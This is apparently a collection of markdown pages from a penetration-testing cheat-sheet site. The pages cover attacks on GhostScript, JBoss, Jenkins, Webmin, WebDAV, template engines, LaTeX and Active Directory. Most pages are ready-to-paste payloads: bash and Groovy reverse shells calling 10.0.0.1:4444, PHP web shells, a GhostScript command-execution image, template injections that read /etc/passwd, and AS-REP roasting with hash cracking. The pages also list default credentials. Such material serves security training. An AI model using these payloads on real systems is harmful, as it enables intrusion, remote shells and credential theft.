/src/exploit/web/ghostscript-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: GhostScript Pentesting 3 | description: GhostScriipt is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution. 4 | tags: 5 | - Web 6 | refs: 7 | - https://seclists.org/oss-sec/2018/q3/142 8 | date: 2023-08-10 9 | draft: false 10 | --- 11 | 12 | ## Arbitrary Command Execution (CVE-2018-16509) Before v9.24 13 | 14 | Reference: [https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) 15 | 16 | If target website uses the functionality which allows user to upload image files associated Python's **Pillow (PIL)**, we can execute remote command over **GhostScript** vulnerability (**`-dSAFER`** bypass using **`OutputFile`**). 17 | Create an image file in which contents as below, then upload it. Command will be executed in the target server. 18 | 19 | ```txt 20 | %!PS-Adobe-3.0 EPSF-3.0 21 | %%BoundingBox: -0 -0 100 100 22 | 23 | userdict /setpagedevice undef 24 | save 25 | legal 26 | { null restore } stopped { pop } if 27 | { legal } stopped { pop } if 28 | restore 29 | mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/web/java-rmi-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Java RMI Pentesting 3 | description: Java RMI (Java Remote Method Invocation) is a Java-based application programming interface (API) that enables developers to create distributed applications in which objects residing in one Java Virtual Machine (JVM) can invoke methods on objects residing in separate JVMs. It uses the port 1098, 1099. 4 | tags: 5 | - Web 6 | date: 2023-03-29 7 | refs: 8 | draft: false 9 | --- 10 | 11 | No content yet. -------------------------------------------------------------------------------- /src/exploit/web/jboss-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: JBOSS Pentesting 3 | description: JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java. 4 | tags: 5 | - Web 6 | date: 2023-03-29 7 | refs: 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | msfconsole 15 | msf > use auxiliary/scanner/http/jboss_vulnscan 16 | ``` 17 | 18 |
19 | 20 | ## Common Directories 21 | 22 | ```txt 23 | /admin-console/ 24 | /invoker/JMXInvokerServlet 25 | /jbossws/ 26 | /jmx-console/ 27 | /jmx-console/HtmlAdaptor 28 | /management 29 | /manager 30 | /status?full=true 31 | /web-console/ 32 | /web-console/Invoker 33 | /web-console/ServerInfo.jsp 34 | ``` 35 | 36 |
37 | 38 | ## Default Credentials 39 | 40 | ```txt 41 | admin:admin 42 | ``` 43 | 44 |
45 | 46 | ## Exploitation 47 | 48 | [JexBoss](https://github.com/joaomatosf/jexboss) is available as an exploitation CLI tool. 49 | 50 | ```bash 51 | git clone https://github.com/joaomatosf/jexboss.git 52 | cd jexboss 53 | pip3 install -r requirements.txt 54 | python3 jexboss.py -host https://example.com:8080 55 | 56 | # Reverse Shell 57 | Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1 58 | ``` -------------------------------------------------------------------------------- /src/exploit/web/jenkins-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Jenkins Pentesting 3 | description: Jenkins is an automation server which helps automate the parts of software development related to building, testing, and deploying, etc. 4 | tags: 5 | - Reverse Shell 6 | - Web 7 | date: 2023-01-01 8 | refs: 9 | draft: false 10 | --- 11 | 12 | ## Brute Force Credentials 13 | 14 | ```sh 15 | msfconsole 16 | msf > use auxiliary/scanner/http/jenkins_login 17 | ``` 18 | 19 |
20 | 21 | ## Reverse Shell on Dashboard 22 | 23 | You need to have the credential. 24 | 25 | 1. **Opening Listener on Your Local Machine** 26 | 27 | ```sh 28 | nc -lvnp 4444 29 | ``` 30 | 31 | 2. **Login to Jenkins** 32 | 33 | Access "http://localhost:8080" in browser and login. 34 | 35 | 3. **Click "Manage Jenkins" -> "Script Console"** 36 | 37 | 4. **Add the Payload in the Console** 38 | 39 | ```java 40 | r = Runtime.getRuntime() 41 | p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp//4444; cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 42 | p.waitFor() 43 | ``` 44 | 45 | 5. **Click "Run"** 46 | 47 | Then you should get a shell. -------------------------------------------------------------------------------- /src/exploit/web/limesurvey-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LimeSurvey Pentesting 3 | description: LimeSurvey is a statistical servey web app written in PHP based on MySQL, SQLite, PostgreSQL or MSSQL database. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-31 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:password 15 | ``` 16 | 17 | ## Remote Code Execution (RCE) version < 3.16 18 | 19 | Reference: [https://www.exploit-db.com/exploits/46634](https://www.exploit-db.com/exploits/46634) 20 | -------------------------------------------------------------------------------- /src/exploit/web/llm-chatbot-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LLM Chatbot Pentesting 3 | description: An LLM chatbot in a web application can be abused with some exploit techniques. 4 | tags: 5 | - LLM 6 | - Web 7 | refs: 8 | date: 2025-03-12 9 | draft: false 10 | --- 11 | 12 | ## SSTI 13 | 14 | If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example, 15 | 16 | ```txt 17 | Prompt: How are you? {{ 2*3 }} 18 | 19 | Response: I will answer your question "How are you? 6". I'm good, thanks! How about you? 20 | ``` 21 | 22 | If it works, we can achieve reverse shell. -------------------------------------------------------------------------------- /src/exploit/web/method/_data.yml: -------------------------------------------------------------------------------- 1 | category2: method -------------------------------------------------------------------------------- /src/exploit/web/method/http-rate-limit-bypass.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HTTP Rate Limit Bypass 3 | description: The 429 “Too Many Requests” response in HTTP header occurs when the client has sent too many requests in a given amount of time (rate limiting). That is because the server limits the number of requests. However, we may be able to bypass this restriction. 4 | tags: 5 | - Web 6 | refs: 7 | - https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c 8 | date: 2023-03-07 9 | draft: false 10 | --- 11 | 12 | ## Bypass 13 | 14 | We may be able to bypass the rate limiting by adding one of the following headers and change the IP per request. 15 | Sometimes, we need to add multiple headers. 16 | 17 | ```bash 18 | X-Forwarded: 19 | X-Forwarded-For: 20 | X-Forwarded-Host: 21 | X-Client-IP: 22 | X-Remote-IP: 23 | X-Remote-Addr: 24 | X-Host: 25 | X-Originating-IP: 26 | ``` 27 | -------------------------------------------------------------------------------- /src/exploit/web/method/waf-detection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WAF (Web Application Firewall) Detection 3 | description: WAF (Web Application Firewall) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-07-14 8 | draft: false 9 | --- 10 | 11 | ## Automation 12 | 13 | ```bash 14 | nmap --script=http-waf-fingerprint example.com 15 | 16 | wafw00f https://example.com 17 | ``` -------------------------------------------------------------------------------- /src/exploit/web/microsoft/_data.yml: -------------------------------------------------------------------------------- 1 | category2: microsoft -------------------------------------------------------------------------------- /src/exploit/web/opencats-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: OpenCATS Pentesting 3 | description: OpenCATS is an Applicant Tracking System designed for Recruiters to manage recruiting process from job posting, candidate application, through to candidate selection and submission. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-31 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:admin 15 | admin:cats 16 | ``` -------------------------------------------------------------------------------- /src/exploit/web/php-rce-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: PHP RCE Cheat Sheet 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-10-05 8 | draft: false 9 | --- 10 | 11 | ## Web Shell 12 | 13 | ```bash 14 | 15 | 16 | <%3fphp+system($_['cmd']);%3f> 17 | <%3fphp+echo+system($_['cmd']);%3f> 18 | ``` 19 | 20 | We can access to `/?cmd=whoami`. 21 | 22 |
23 | 24 | ## Reverse Shell 25 | 26 | ```bash 27 | & /dev/tcp/10.0.0.1/4444 0>&1');?> 28 | & /dev/tcp/10.0.0.1/4444 0>&1"');?> 29 | <%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f> 30 | <%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f> 31 | ``` -------------------------------------------------------------------------------- /src/exploit/web/restaurant-management-system.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Restaurant Management System (RMS) Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-29 8 | draft: false 9 | --- 10 | 11 | ## Remote Code Execution (RCE) v1.0 12 | 13 | See the [Exploit-DB](https://www.exploit-db.com/exploits/47520) for details. 14 | 15 | ```bash 16 | python3 rms-rce.py https://example.com/rms/ 17 | ``` 18 | 19 | When uploading successfully, we can access to https://example.com/rms/images/reverse-shell.php?cmd=id -------------------------------------------------------------------------------- /src/exploit/web/security-risk/_data.yml: -------------------------------------------------------------------------------- 1 | category2: security-risk -------------------------------------------------------------------------------- /src/exploit/web/security-risk/crlf-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CRLF (Carriage Return Line Feed) Injection 3 | description: CRLF Injection occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 4 | tags: 5 | - Web 6 | refs: 7 | - https://owasp.org/www-community/vulnerabilities/CRLF_Injection 8 | date: 2022-12-26 9 | draft: false 10 | --- 11 | 12 | No content yet. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/dom-cloberring.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: DOM Cloberring 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | - https://portswigger.net/web-security/dom-based/dom-clobbering 8 | date: 2023-06-15 9 | draft: false 10 | --- 11 | 12 | ## Basic Exploitation 13 | 14 | If the website adds the JavaScript code into the DOM when loading page as below, 15 | 16 | ```jsx 17 | window.onload = function() { 18 | let someObj = window.someObj || {}; 19 | let script = document.createElement('script'); 20 | script.src = someObj.url; 21 | document.body.appendChild(script); 22 | } 23 | ``` 24 | 25 | We may manipulate this **`someObj`** and override the properties (**`url`** here) using **`anchor`** elements, then we can execute arbitrary JavaScript code. 26 | For example, insert the following code in the comment, search, etc. in the target website. 27 | 28 | ```html 29 | 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/erb-ssti.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ERB SSTI 3 | description: ERB may be vulnerable to SSTI. 4 | tags: 5 | - Web 6 | refs: 7 | - https://trustedsec.com/blog/rubyerb-template-injection 8 | date: 2024-04-13 9 | draft: false 10 | --- 11 | 12 | ## Payloads 13 | 14 | Try the following payloads on URL path, params, input, etc. 15 | 16 | ```bash 17 | <%= 7*7 %> 18 | <%= user.username %> 19 | <%= system("whoami"); %> 20 | ``` 21 | 22 |
23 | 24 | ## Exploit 25 | 26 | If the above payloads affect responses, we can inject arbitrary code as below: 27 | 28 | ```bash 29 | <%= system("ping -c 1 10.0.0.1"); %> 30 | 31 | # Reverse Shell 32 | <%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %> 33 | ``` -------------------------------------------------------------------------------- /src/exploit/web/security-risk/file-upload-attack-on-imagemagick.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: File Upload Attack on ImageMagick 3 | description: If website uses ImageMagick to analyze or modify uploaded images, we might be able to execute remote code. 4 | tags: 5 | - Web 6 | refs: 7 | - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20ImageMagick 8 | date: 2023-08-24 9 | draft: false 10 | --- 11 | 12 | This page is no content yet, but please refer to the references below to achieve this attack. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/host-header-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Host Header Attack 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | - https://portswigger.net/web-security/host-header/exploiting 8 | date: 2023-06-11 9 | draft: false 10 | --- 11 | 12 | ## Abuse Connection State 13 | 14 | If the web server validates only the first request, we may be able to exploit the second request by keeping the connection and changing the **Host** header to the internal page. 15 | 16 | ### 1. Send the First Request 17 | 18 | ```bash 19 | GET / HTTP/2 20 | Host: example.com 21 | ... 22 | Connection: keep-alive 23 | 24 | ``` 25 | 26 | ### 2. Send the Second Request. 27 | 28 | ```bash 29 | POST /admin/change-email HTTP/2 30 | Host: 192.168.0.1 31 | 32 | email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com 33 | ``` 34 | 35 | As a result, we may be able to change the admin's email to arbitrary email. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/http-header-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: HTTP Header Injection 3 | description: If the target site inserts user provided value into the response header without sanitizing, attacker may inject arbitrary key/value. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2024-02-08 8 | draft: false 9 | --- 10 | 11 | ## Exploit 12 | 13 | By inserting `\r\n` (URL encoded: `%0d%0a` ), we may inject arbitrary header value in the response. 14 | 15 | ```bash 16 | # Inject "\r\nSet-Cookie: sessionid=123456" into the response header 17 | /?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456 18 | ``` 19 | 20 |
21 | 22 | ## Exploit (XSS) 23 | 24 | ```bash 25 | /?origin=example%0d%0a 26 | ``` -------------------------------------------------------------------------------- /src/exploit/web/security-risk/idor-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: IDOR (Insecure Direct Object References) Attack 3 | description: IDOR is a type of access control vulnerability in web applications. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-22 8 | draft: false 9 | --- 10 | 11 | ## Find Vulnerabilities from HTML Source Code 12 | 13 | First check values of attributes on input elements. 14 | 15 | ```html 16 | 17 | ``` 18 | 19 | Then try what will happen when you change the Cookie value in a HTTP header. 20 | 21 | ```txt 22 | Cookie: user_id=12 23 | ``` 24 | 25 |
26 | 27 | ## Change GET Parameters 28 | 29 | ### Manual 30 | 31 | ```sh 32 | /user?id=1 33 | /user?id=2 34 | /user?id=-1 35 | /user?id=00 36 | 37 | /admin/posts/1 38 | /admin/posts/-1 39 | /admin/posts/00 40 | 41 | /static/1.txt 42 | /static/2.txt 43 | /static/-1.txt 44 | /static/00.txt 45 | ``` 46 | 47 | ### Automation 48 | 49 | ```sh 50 | seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w - 51 | 52 | wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ 53 | ``` 54 | 55 |
56 | 57 | ## Change POST Parameters 58 | 59 | ```bash 60 | address=1&user_id=1 61 | address=1&user_id=2 62 | 63 | # URL Encode '&' 64 | address=1%26user_id=2 65 | ``` 66 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/insecure-deserialization.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Insecure Deserialization 3 | description: Insecure Deserialization is the exploitation of vulnerabilities in the deserialization process of a computer system to execute unauthorized code, gain access to sensitive information, or perform other malicious actions. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-17 8 | draft: false 9 | --- 10 | 11 | ## PHP Gadget Chains 12 | 13 | ### PHPGGC 14 | 15 | **[PHPGGC](https://github.com/ambionics/phpggc)** is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. 16 | 17 | ```sh 18 | phpggc -l 19 | ``` 20 | 21 |
22 | 23 | ## Ysoserial 24 | 25 | **[Ysoserial](https://github.com/frohoff/ysoserial)** is a proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. 26 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/latex-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: LaTeX Injection 3 | description: LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal. 4 | tags: 5 | - Web 6 | refs: 7 | - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection 8 | - https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection 9 | date: 2023-06-19 10 | draft: false 11 | --- 12 | 13 | ## Payloads - Read Files 14 | 15 | ```bash 16 | # Read file 17 | \input{/etc/passwd} 18 | $\input{/etc/passwd}$ 19 | $$\input{/etc/passwd}$$ 20 | 21 | \include{example} # Read example.tex 22 | $\include{example}$ 23 | $$\include{example}$$ 24 | 25 | \lstinputlisting{/etc/passwd} 26 | $\lstinputlisting{/etc/passwd}$ 27 | $$\lstinputlisting{/etc/passwd}$$ 28 | ``` 29 | 30 |
31 | 32 | ## Payloads - Write File 33 | 34 | ```bash 35 | \newwrite\outfile 36 | $\newwrite\outfile$ 37 | $$\newwrite\outfile$$ 38 | 39 | \openout\outfile=cmd.tex 40 | $\openout\outfile=cmd.tex$ 41 | $$\openout\outfile=cmd.tex$$ 42 | 43 | \write\outfile{Hello-World} 44 | $\write\outfile{Hello-World}$ 45 | $$\write\outfile{Hello-World}$$ 46 | ``` 47 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/sql-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SQL Injection 3 | description: SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. 4 | tags: 5 | - Database 6 | - Reverse Shell 7 | - SQL Injection 8 | - Web 9 | refs: 10 | date: 2023-06-27 11 | draft: false 12 | --- 13 | 14 | ## Identify Where SQL Injection can be Performed 15 | 16 | There are many places where SQLi can be performed. For example, 17 | 18 | - URL parameters 19 | - POST parameters 20 | - HTTP request headers (Cookie, User-Agent, etc.) 21 | 22 |
23 | 24 | ## Cheat Sheet 25 | 26 | To see SQL injection cheat sheet, please refer to [this page](/exploit/web/security-risk/sql-injection-cheat-sheet/). 27 | 28 |
29 | -------------------------------------------------------------------------------- /src/exploit/web/security-risk/wkhtmltopdf-ssrf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: wkhtmltopdf SSRF 3 | description: wkhtmltopdf is a command line tool to render HTML into PDF using Qt WebKit. It is vulnerable to SSRF. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-04-08 8 | draft: false 9 | --- 10 | 11 | ## Exploitation 12 | 13 | Create a PHP payload to read local file. 14 | 15 | ```php 16 | 17 | ``` 18 | 19 | Then start web server in local machine. 20 | 21 | ```bash 22 | php -S 0.0.0.0:8000 23 | ``` 24 | 25 | Send request to where wkhtmltopdf is affected. For example, 26 | 27 | ```bash 28 | /htmltopdf?item= 29 | ``` 30 | 31 | Now we can see the system users list via a generated PDF. -------------------------------------------------------------------------------- /src/exploit/web/security-risk/xst.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: XST (Cross-Site Tracing) 3 | description: XST is a network security vulnerability exploiting the HTTP TRACE method. 4 | tags: 5 | - Web 6 | - XST 7 | refs: 8 | date: 2022-12-22 9 | draft: false 10 | --- 11 | 12 | ## Add Cookie Header 13 | 14 | ```sh 15 | TRACE / HTTP/1.1 16 | ... 17 | Cookie: name=value 18 | ... 19 | ``` -------------------------------------------------------------------------------- /src/exploit/web/template-engine/_data.yml: -------------------------------------------------------------------------------- 1 | category2: template-engine -------------------------------------------------------------------------------- /src/exploit/web/template-engine/jsrender-template-injection.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: JsRender Template Injection 3 | description: JsRender is a light-weight but powerful template engine. It is vulnerable to template injection. 4 | tags: 5 | - SSTI 6 | - Web 7 | refs: 8 | - https://appcheck-ng.com/template-injection-jsrender-jsviews 9 | date: 2023-03-26 10 | draft: false 11 | --- 12 | 13 | ## Investigation 14 | 15 | Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template. 16 | 17 | ```bash 18 | {{:2*3}} 19 | {{:"test".toString}} 20 | ``` 21 | 22 |
23 | 24 | ## Exploitation 25 | 26 | ```bash 27 | # XSS 28 | {{:"test".toString.constructor.call({},"alert(1)")}} 29 | # Read local files 30 | {{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}} 31 | ``` 32 | -------------------------------------------------------------------------------- /src/exploit/web/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category2: tool -------------------------------------------------------------------------------- /src/exploit/web/tool/add-custom-http-headers-in-burp-suite.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Add Custom HTTP Headers in Burp Suite 3 | description: In Burp Suite, we can add custom header by setting up options. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Add Custom HTTP Headers 12 | 13 | In some cases such as bug bounty programs, it may be convenient to set custom HTTP headers in advance. 14 | 15 | 1. Go to **Proxy -> Options** tab. 16 | 2. Scroll down to **"Match and Replace"**. 17 | 3. Click on **"Add"**. 18 | 4. Set rule: 19 | 20 | - **User Agent** 21 | 22 | ```txt 23 | Type: Request header 24 | Match: ^User-Agent.*$ 25 | Replace: User-Agent: HackerOne-username 26 | Comment: 27 | ``` 28 | 29 | - **New Original Header** 30 | 31 | ```txt 32 | Type: Request header 33 | Match: (empty) 34 | Replace: X-Bug-Bounty: HackerOne-username 35 | Comment: 36 | ``` 37 | 38 | 5. Check the box of **"Regex match"**. 39 | 6. Click on **"OK"**. 40 | 7. Search for the rule in the list and click on **"Enabled"**. 41 | -------------------------------------------------------------------------------- /src/exploit/web/tool/burp-suite-troubleshooting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Burp Suite Troubleshooting 3 | description: This article might be able to fix the problems of Burp Suite. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-11-28 8 | draft: false 9 | --- 10 | 11 | ## Fix Error “Failed to connect to x.x.x.x:443” 12 | 13 | If we try to HTTP access rather than HTTPS, This error occurs because the Burp’s embedded browser uses secure connections automatically by default. 14 | 15 | If we got the error, we may be able to solve the problem by the following methods: 16 | 17 | 1. In the embedded browser, open Settings by clicking on three dots menu icon. 18 | 2. Once Settings screen opens, go to “Privacy and security” → “Security”. 19 | 3. In “Advanced” section, uncheck “Always use secure connections” then close the Settings. 20 | 4. Enter the desired URL including “http://”. **If all goes well, we may be able to access it.** 21 | -------------------------------------------------------------------------------- /src/exploit/web/tool/integrate-burp-request-and-sqlmap.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Integrate Burp Request and SQLmap 3 | description: We can use the Burp Suite request state for SQLmap by downloading item. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Download Request File in Burp Suite 12 | 13 | 1. Right click on the request field in **Burp Suite**. 14 | 2. Click **"Save item"** or **"Copy to file"** to download the request state. 15 | 3. Save as **"request.txt"** (this is arbitrary name). 16 | 17 |
18 | 19 | ## Using Request File in SQLmap 20 | 21 | After downloading the request file in Burp Suite as the previous section, we can use when running **SQLmap**. 22 | 23 | ```sh 24 | sqlmap -r request.txt 25 | ``` 26 | 27 | By the way, we can see what **SQLmap** send payloads to websites by adding the **`--proxy`** flag. 28 | 29 | ```sh 30 | # 8080 is the default port of Burp Suite 31 | sqlmap -r request.txt --proxy http://127.0.0.1:8080 32 | ``` -------------------------------------------------------------------------------- /src/exploit/web/tool/socks-proxy-in-burp-suite.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SOCKS Proxy in Burp Suite 3 | description: If we want to use SOCKS proxy in Burp Suite, we can add it in the proxy setting. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-08-14 8 | draft: false 9 | --- 10 | 11 | ## Setup SOCKS Proxy 12 | 13 | 1. In **Burp Suite**, go to **Proxy → Proxy settings**. 14 | 2. In the settings window, select **User** tab and go to **Netwotk → Connections** in left pane. 15 | 3. In the **SOCKS** proxy section, enable **"Override options for this project only"**. 16 | 4. Fill proxy host and port as follow: 17 | 18 | ```bash 19 | SOCKS proxy host: 127.0.0.1 20 | SOCKS proxy port: 9251 21 | ``` 22 | 23 | 5. Check **"Use SOCKS proxy"** and close the window. 24 | -------------------------------------------------------------------------------- /src/exploit/web/web-browser-settings-for-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Web Browser Settings for Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-24 8 | draft: false 9 | --- 10 | 11 | 12 | ## Bypass Port Protection 13 | 14 | Many browsers don't accept uncommon ports for HTTP (HTTPS). 15 | For example, when we attempt to access [http://example.com:22](http://example.com:22/), browsers present that it cannot be accessed. 16 | 17 | To release such a restricted thing, we can edit the setting in browsers. 18 | 19 | ### Firefox 20 | 21 | 1. Enter **"about:config"** in search bar. 22 | 2. Input **"network.security.ports.banned.override"** in the form. 23 | 3. Add the desired port (e.g. “22”) to **string**. -------------------------------------------------------------------------------- /src/exploit/web/web-php-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Web PHP Pentesting 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2024-05-17 8 | draft: false 9 | --- 10 | 11 | ## Source Code Reveal 12 | 13 | Try appending `~` suffix at the end of the `php` extension in path. This is the temporary file which is created by editors or version control systems so it’s worth try it to see the source code. 14 | 15 | ```txt 16 | https://example.com/index.php~ 17 | ``` 18 | 19 |
20 | 21 | ## Deobfuscate PHP Files with Syntax Highlighting 22 | 23 | According to the [PHP Manual](https://www.php.net/manual/en/function.highlight-file.php), you might be able to deobfuscate php files by accessing with **`phps`** extension if the "highlight_file" is used in the target website. 24 | 25 | ```txt 26 | https://vulnerable.com/index.phps 27 | ``` -------------------------------------------------------------------------------- /src/exploit/web/webdav-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: WebDAV Pentesting 3 | description: WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-01-09 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```sh 14 | msfconsole 15 | msf> use auxiliary/scanner/http/webdav_scanner 16 | ``` 17 | 18 |
19 | 20 | ## Default Credentials 21 | 22 | ```sh 23 | wampp:xampp 24 | ``` 25 | 26 |
27 | 28 | ## Reverse Shell 29 | 30 | ### 1. Check if the exploit can be uploaded 31 | 32 | ```sh 33 | davtest -url http://example.com/davdir -auth 'user:pass' 34 | ``` 35 | 36 | ### 2. Upload the Reverse Shell Script 37 | 38 | If we can upload the file e.g. PHP file, upload the script for reverse shell. 39 | 40 | ```sh 41 | davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php 42 | ``` 43 | 44 | ### 3. Get a Shell 45 | 46 | In local machine, start listener for getting a shell. 47 | 48 | ```sh 49 | nc -lvnp 4444 50 | ``` 51 | 52 | Now access to http://example.com/davdir/shell.php. 53 | We should get a shell. -------------------------------------------------------------------------------- /src/exploit/web/webmin-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Webmin Pentesting 3 | description: Webmin is a web-based system administration tool for Unix. The default port is 10000. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-01 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```txt 14 | admin:admin 15 | ``` 16 | 17 |
18 | 19 | ## password_chagne.cgi Command Injection version=1.890 20 | 21 | ```sh 22 | msfconsole 23 | msf> use exploit/linux/http/webmin_backdoor 24 | msf> set rhosts 25 | msf> set lhost 26 | msf> run 27 | shell 28 | ``` 29 | 30 |
31 | 32 | ## Remote Code Execution (RCE) version\<2.37 33 | 34 | Webmin version\<2.37 is vulnerable to remote code execution. 35 | Download the payload . 36 | 37 | ```sh 38 | git clone https://github.com/MuirlandOracle/CVE-2019-15107 39 | cd CVE-2019-15107 40 | python3 CVE-2019-15107.py 41 | ``` 42 | -------------------------------------------------------------------------------- /src/exploit/windows/_data.yml: -------------------------------------------------------------------------------- 1 | category1: windows 2 | related_menus: 3 | - title: Active Directory 4 | id: active-directory 5 | - title: Protocol 6 | id: protocol 7 | - title: Service 8 | id: service 9 | - title: Privilege Escalation 10 | id: privilege-escalation 11 | - title: Post Exploitation 12 | id: post-exploitation 13 | - title: Forensics 14 | id: forensics 15 | - title: PowerShell 16 | id: powershell 17 | - title: WSL 18 | id: wsl 19 | - title: Technique 20 | id: technique -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/_data.yml: -------------------------------------------------------------------------------- 1 | category2: active-directory -------------------------------------------------------------------------------- /src/exploit/windows/active-directory/as-rep-roasting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AS-REP Roasting 3 | description: AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory. 4 | tags: 5 | - Active Directory 6 | - Windows 7 | refs: 8 | date: 2025-04-19 9 | draft: false 10 | --- 11 | 12 | ## Exploit 13 | 14 | Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting. 15 | 16 | ```sh 17 | impacket-GetNPUsers example.local/ 18 | impacket-GetNPUsers -dc-ip example.local/ -no-pass -usersfile users.txt 19 | impacket-GetNPUsers -dc-ip example.local/ -no-pass -format hashcat 20 | 21 | # Without authenticatino 22 | netexec ldap -u users.txt -p '' --asreproast output.txt 23 | # With authentication 24 | netexec ldap -u username -p password --asreproast output.txt 25 | # With Kerberos authentication (-k) 26 | netexec ldap -k --asreproast output.txt 27 | ``` 28 | 29 | If we find a password hash, crack it. 30 | 31 | ```sh 32 | john --format=krb5asrep --wordlist=wordlist.txt hash.txt 33 | # or 34 | hashcat -m 18200 -a 0 hash.txt wordlist.txt 35 | ``` 36 | 37 | 